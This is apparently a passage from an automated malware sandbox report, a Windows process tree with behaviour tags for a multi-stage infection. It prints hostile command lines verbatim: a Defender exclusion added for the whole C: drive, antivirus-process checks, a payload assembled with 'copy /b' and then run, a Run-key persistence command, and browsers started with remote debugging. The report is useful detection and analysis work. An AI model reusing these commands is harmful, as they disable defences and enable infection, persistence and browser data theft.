        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5936
      - C:\Users\Admin\AppData\Local\Temp\10478750101\9b345cc369.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478750101\9b345cc369.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:5604
      - C:\Users\Admin\AppData\Local\Temp\10478760101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478760101\amnew.exe"
        6⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5192
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        
        PID:5088
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        
        PID:3340
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2400
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:5220
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffacc14dcf8,0x7ffacc14dd04,0x7ffacc14dd10
        11⤵
        
        PID:5224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1960 /prefetch:2
        11⤵
        
        PID:3876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2212,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2220 /prefetch:3
        11⤵
        
        PID:4792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2324 /prefetch:8
        11⤵
        
        PID:4116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3228 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:1564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3292 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:3356
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4296 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:1576
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4652,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4608 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:4472
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5152,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5160 /prefetch:8
        11⤵
        
        PID:5216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5424,i,13094539226488165923,4568551597152748047,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5576 /prefetch:8
        11⤵
        
        PID:5504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:1544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x264,0x7ffabdcdf208,0x7ffabdcdf214,0x7ffabdcdf220
        11⤵
        
        PID:4704
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2060,i,13941879900744536122,13963558090284520819,262144 --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:2
        11⤵
        
        PID:4648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1992,i,13941879900744536122,13963558090284520819,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:3
        11⤵
        
        PID:936
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,13941879900744536122,13963558090284520819,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:8
        11⤵
        
        PID:3944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3556,i,13941879900744536122,13963558090284520819,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:3436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3564,i,13941879900744536122,13963558090284520819,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:4892
        
        C:\ProgramData\26x4wtrim7.exe
        
        "C:\ProgramData\26x4wtrim7.exe"
        10⤵
        
        PID:8116
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:7180
        
        C:\ProgramData\dbi5xl6xtr.exe
        
        "C:\ProgramData\dbi5xl6xtr.exe"
        10⤵
        
        PID:4680
        
        C:\ProgramData\dbi5xl6xtr.exe
        
        "C:\ProgramData\dbi5xl6xtr.exe"
        11⤵
        
        PID:264
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        12⤵
        
        PID:4748
        
        C:\ProgramData\00000000hl.exe
        
        "C:\ProgramData\00000000hl.exe"
        10⤵
        
        PID:1864
        
        C:\Users\Admin\AppData\Local\Temp\RfvOxY0I\oIkRrrZKxQv5HKG8.exe
        
        C:\Users\Admin\AppData\Local\Temp\RfvOxY0I\oIkRrrZKxQv5HKG8.exe 0
        11⤵
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\RfvOxY0I\MKgJMvgYx3vkv5Ao.exe
        
        C:\Users\Admin\AppData\Local\Temp\RfvOxY0I\MKgJMvgYx3vkv5Ao.exe 7112
        12⤵
        
        PID:6272
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 656
        13⤵
        Program crash
        
        PID:3976
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 1368
        12⤵
        Program crash
        
        PID:24348
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\ln7ym" & exit
        10⤵
        
        PID:9936
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        11⤵
        Delays execution with timeout.exe
        
        PID:18172
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
        8⤵
        
        PID:5640
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
        8⤵
        
        PID:3312
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\10046340101\3e77b6154c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046340101\3e77b6154c.exe"
        8⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
        9⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        
        PID:4676
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        10⤵
        
        PID:3020
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        10⤵
        Enumerates processes with tasklist
        
        PID:7660
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        10⤵
        
        PID:7676
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 674187
        10⤵
        
        PID:7920
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Funky.wbk
        10⤵
        
        PID:1228
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Und" Tournament
        10⤵
        
        PID:7124
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
        10⤵
        
        PID:4892
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
        10⤵
        
        PID:7036
        
        C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
        
        Constraints.com r
        10⤵
        
        PID:7156
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        10⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
        8⤵
        
        PID:4664
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\10053320101\3bf182cb3c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053320101\3bf182cb3c.exe"
        8⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053320101\3bf182cb3c.exe"
        9⤵
        
        PID:6440
        
        C:\Users\Admin\AppData\Local\Temp\10053330101\687ace683e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053330101\687ace683e.exe"
        8⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053330101\687ace683e.exe"
        9⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\10053340101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053340101\crypted.exe"
        8⤵
        
        PID:2324
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5112
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:6380
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10478771121\5uMVCoG.cmd"
        6⤵
        
        PID:264
      - C:\Users\Admin\AppData\Local\Temp\10478780101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478780101\qhjMWht.exe"
        6⤵
        
        PID:3232
      - C:\Users\Admin\AppData\Local\Temp\10478790101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478790101\larBxd7.exe"
        6⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        7⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:7144
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:7752
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        8⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        8⤵
        
        PID:8028
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        8⤵
        
        PID:7320
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        8⤵
        
        PID:6216
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        8⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        8⤵
        
        PID:6212
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        
        PID:6988
      - C:\Users\Admin\AppData\Local\Temp\10478800101\LJl8AAr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478800101\LJl8AAr.exe"
        6⤵
        
        PID:2368
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5740
      - C:\Users\Admin\AppData\Local\Temp\10478810101\n0hEgR9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478810101\n0hEgR9.exe"
        6⤵
        
        PID:5312
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4716
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5176
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:1564
      - C:\Users\Admin\AppData\Local\Temp\10478820101\RYZusWg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478820101\RYZusWg.exe"
        6⤵
        
        PID:2504
      - C:\Users\Admin\AppData\Local\Temp\10478830101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478830101\UZPt0hR.exe"
        6⤵
        
        PID:7932
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:6832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4340
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:6164
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:8064
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:6724
      - C:\Users\Admin\AppData\Local\Temp\10478840101\VrQSuEQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478840101\VrQSuEQ.exe"
        6⤵
        
        PID:1864
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:8080
      - C:\Users\Admin\AppData\Local\Temp\10478850101\mtCxnCB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478850101\mtCxnCB.exe"
        6⤵
        
        PID:3160
      - C:\Users\Admin\AppData\Local\Temp\10478860101\ee6df7ee1f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478860101\ee6df7ee1f.exe"
        6⤵
        
        PID:6568
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6788
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:8028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1664
- C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
  C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5884

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5504

C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe"
1⤵
PID:5332
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
  2⤵
  - Executes dropped EXE
  PID:5936
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4380
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
      4⤵
      Executes dropped EXE
      PID:2308
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2480
      - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        6⤵
        Executes dropped EXE
        
        PID:2108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater_service.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:2040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe\"'"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe"
1⤵
PID:1764
- C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
  2⤵
  - Executes dropped EXE
  PID:5504
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3376
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3300
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4276
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3888
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        7⤵
        Executes dropped EXE
        
        PID:3744
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5488
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        9⤵
        Executes dropped EXE
        
        PID:5700
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5664
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        11⤵
        Executes dropped EXE
        
        PID:5604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:772
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        13⤵
        Executes dropped EXE
        
        PID:3024
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        15⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
